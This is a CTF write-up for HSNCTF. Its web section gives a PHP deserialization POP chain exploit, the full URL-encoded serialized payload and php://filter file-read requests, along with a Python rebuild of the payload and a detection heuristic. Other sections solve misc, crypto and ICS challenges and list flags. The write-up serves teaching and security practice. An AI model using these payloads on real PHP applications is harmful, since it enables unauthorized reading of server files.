web
Primitive php
Challenge source:
<?php
highlight_file(__FILE__);
//hint.php
foreach ($_GET as $value) {
    if (preg_match("/flag/", $value)) {
        die("不可以看flag啦,阿sir");
    }
}
$a = new $_GET['class1']($_GET['a']);
$b = new $_GET['class2']($_GET['b']);
if ($a !== $b and md5($a) === md5($b)) {
    echo new $_GET['class3']($_GET['c']);
}
Attempts at RCE to read the flag got nowhere, so use a stream wrapper (pseudo-protocol) to read hint.php instead. Two Exception objects built with the same message on the same line stringify identically, so md5($a) === md5($b) holds while $a !== $b, and execution reaches echo new SplFileObject($c). Echoing an SplFileObject prints only its first line, and the php://filter base64 encoding turns the whole file into a single line, so the complete source comes back.
payload:
?class2=Exception&b=<script>alert('1')</script>&class1=Exception&a=<script>alert('1')</script>&class3=SplFileObject&c=php://filter/convert.base64-encode/resource=hint.php
Base64-decoding the output gives hint.php:
<?php
echo "no hint";
class blue
{
    public $b1;
    public $b2;
    function eval()
    {
        echo new $this->b1($this->b2);
    }
    public function __invoke()
    {
        $this->b1->blue();
    }
}
class red
{
    public $r1;
    public function __destruct()
    {
        echo $this->r1 . '0xff0000';
    }
    public function execute()
    {
        ($this->r1)();
    }
    public function __call($a, $b)
    {
        echo $this->r1->getFlag();
    }
}
class white
{
    public $w;
    public function __toString()
    {
        $this->w->execute();
        return 'hello';
    }
}
class color
{
    public $c1;
    public function execute()
    {
        ($this->c1)();
    }
    public function getFlag()
    {
        echo file_get_contents($this->c1);
    }
}
unserialize($_POST['cmd']);
Build the deserialization payload. The chain is red::__destruct -> white::__toString -> color::execute -> blue::__invoke -> red::__call -> color::getFlag -> file_get_contents.
Reference:
[DASCTF 2022] March Contest web reproduction - Snakin_ya's blog - CSDN Blog
Use the stream wrapper again to read the flag:
php://filter/convert.base64-encode/resource=flag.php
exp:
<?php
class blue
{
    public $b1;
    public $b2;
    public function __construct($b1)
    {
        $this->b1 = $b1;
    }
}
class red
{
    public $r1;
    public function __construct($r1)
    {
        $this->r1 = $r1;
    }
}
class white
{
    public $w;
    public function __construct($w)
    {
        $this->w = $w;
    }
}
class color
{
    public $c1;
    public function __construct($c1)
    {
        $this->c1 = $c1;
    }
}
$f = new color("php://filter/convert.base64-encode/resource=flag.php");
$e = new red($f);
$d = new blue($e);
$c = new color($d);
$b = new white($c);
$a = new red($b);
echo (urlencode(serialize($a)));
The target feeds the POST parameter to unserialize($_POST['cmd']), so send the printed string as cmd.
payload:
cmd=O%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22white%22%3A1%3A%7Bs%3A1%3A%22w%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3BO%3A4%3A%22blue%22%3A2%3A%7Bs%3A2%3A%22b1%22%3BO%3A3%3A%22red%22%3A1%3A%7Bs%3A2%3A%22r1%22%3BO%3A5%3A%22color%22%3A1%3A%7Bs%3A2%3A%22c1%22%3Bs%3A52%3A%22php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7Ds%3A2%3A%22b2%22%3BN%3B%7D%7D%7D%7D
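As an added example (not code from the original write-up), the Python below rebuilds the same POP chain with a minimal re-implementation of PHP's serialize() so the encoded payload above can be regenerated and checked, and adds a nesting-depth heuristic a defender could run over incoming cmd values. The class and property names are the ones from hint.php; the tuple object model and max_object_depth are this example's own.

```python
from urllib.parse import quote_plus

# A PHP object is modelled as (class_name, {prop: value}); dicts keep declaration order.
def php_serialize(v):
    """Minimal re-implementation of PHP serialize() for str, null and objects."""
    if v is None:
        return "N;"
    if isinstance(v, str):
        return f's:{len(v.encode())}:"{v}";'
    cls, props = v
    body = "".join(php_serialize(k) + php_serialize(p) for k, p in props.items())
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{body}}}'

def build_chain(resource="php://filter/convert.base64-encode/resource=flag.php"):
    """Nest the hint.php gadgets: red::__destruct -> white::__toString ->
    color::execute -> blue::__invoke -> red::__call -> color::getFlag."""
    leaf = ("color", {"c1": resource})                # getFlag(): file_get_contents(c1)
    caller = ("red", {"r1": leaf})                    # __call(): r1->getFlag()
    invokable = ("blue", {"b1": caller, "b2": None})  # __invoke(): b1->blue() -> __call
    executor = ("color", {"c1": invokable})           # execute(): (c1)() -> __invoke
    stringer = ("white", {"w": executor})             # __toString(): w->execute()
    return ("red", {"r1": stringer})                  # __destruct(): echo r1 . '0xff0000' -> __toString

def payload():
    """urlencode(serialize($a)), as the write-up's exp prints it."""
    return quote_plus(php_serialize(build_chain()))

def max_object_depth(serialized):
    """Detection heuristic: deepest brace nesting in serialized input.
    String bodies are skipped by their declared byte length so braces
    inside them are not counted. Form data is shallow; this chain is 6 deep."""
    data = serialized.encode()
    depth = best = i = 0
    while i < len(data):
        if data.startswith(b"s:", i):                 # s:<len>:"<bytes>";
            n_end = data.index(b":", i + 2)
            i = n_end + 2 + int(data[i + 2:n_end]) + 2
            continue
        if data[i] == 0x7B:                           # {
            depth += 1
            best = max(best, depth)
        elif data[i] == 0x7D:                         # }
            depth -= 1
        i += 1
    return best
```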
HSNCTF{537C532E-408B-FDCD-3E49-58E6FB578579}
misc
extract
Use the tool cloakify.
kali:
Open the saved file.
Change the extension to zip.
Nested zips, one inside the other, with the file name number decreasing by 1 at each layer.
Script:
import zipfile

count = 2331
while count > 0:
    # each fN.zip contains f(N-1).zip, so extract from the outermost number down
    path = 'f' + str(count) + '.zip'
    folder_abs = '.'
    zip_file = zipfile.ZipFile(path)
    zip_list = zip_file.namelist()
    for f in zip_list:
        zip_file.extract(f, folder_abs)
    zip_file.close()
    count -= 1
Result:
hsnctf{66eec912-e9ce-4e1d-ac54-ecea075dcb96}
Sign-in challenge
hsnctf{welcome_to_hsnctf}
Alien Radio Waves~
The zip file data is base64-encoded; decode it.
This gives an encrypted archive.
An NTFS data stream (ADS) hides the next piece.
From it you get audio; export it and decode it with SSTV.
Extract the archive to get the flag.
hsnctf{70995fb0-eb60-0787-f305-77066aeb6730}
Crypto
daobudao
hsnctf{g00d_luck_have_fun}
ICS traffic analysis
S7_analysis
Browsing through the packets, there is a Stop.
hsnctf{399}
Simp Diary
Babe, I just finished showering. The water heater seemed broken while I was in there, the water kept going cold and hot, and I suddenly thought of you, because you are hot and cold with me too.